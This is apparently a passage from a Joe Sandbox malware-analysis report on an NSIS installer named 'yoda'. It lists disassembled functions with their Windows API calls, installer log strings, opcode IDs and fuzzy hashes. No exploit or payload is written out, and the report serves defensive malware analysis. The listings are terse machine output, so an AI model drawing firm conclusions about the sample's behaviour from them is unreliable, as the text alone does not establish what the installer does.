                                                                                                                                                                                                                                                                • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
• MulDiv.KERNEL32(0000F200,00000064,000D0618), ref: 00403295
• wsprintfW.USER32 ref: 004032A5
• SetWindowTextW.USER32(?,?), ref: 004032B5
• SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
Strings
• verifying installer: %d%%, xrefs: 0040329F
Memory Dump Source
• Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yoda.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
• CharNextW.USER32(?,?,?,00000000), ref: 004060D6
• CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
• CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yoda.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GlobalFree.KERNEL32(00899408), ref: 00402387
Strings
Memory Dump Source
• Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yoda.jbxd
Similarity
• API ID: FreeGloballstrcpyn
• String ID: %TechnoBecome%$Exch: stack < %d elements$Pop: stack empty
• API String ID: 1459762280-1480458765
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Memory Dump Source
• Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yoda.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00899408), ref: 00402387
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                • String ID: %02x%c$...
                                                                                                                                                                                                                                                                • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                • String ID: Version
                                                                                                                                                                                                                                                                • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
